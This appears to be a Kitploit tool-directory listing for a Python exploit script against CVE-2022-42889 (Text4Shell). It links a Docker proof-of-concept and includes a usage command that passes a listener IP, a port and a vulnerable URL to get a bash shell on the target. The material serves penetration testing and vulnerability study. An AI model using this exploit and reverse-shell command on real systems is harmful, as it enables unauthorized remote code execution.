Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2022-42889 — python script for CVE-2022-42889 | Kitploit
Tools/GitHubGitHub/s3l33/cve-2022-42889
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubs3l33/cve-2022-42889

CVE-2022-42889

python script for CVE-2022-42889

View Repository
333 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2022-42889

Python script for CVE-2022-42889

To test this locally follow the docker POC: https://github.com/karthikuj/cve-2022-42889-text4shell-docker

For a PHP version of this: https://github.com/ClickCyber/cve-2022-42889

If youre running this and exploiting it locally, the IP you need to use is the gateway generated when the docker container is created

After getting a bash shell on the docker container image image

Ensure you make the script executable with chmod

root@kitploit:~
./cve-2022-42889.py 172.17.0.1 9001 'http://localhost/text4shell/attack?search='

image

NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-42889

TLDR: You could also just curl the request_payload (variable from the code) example directly.

Download Tool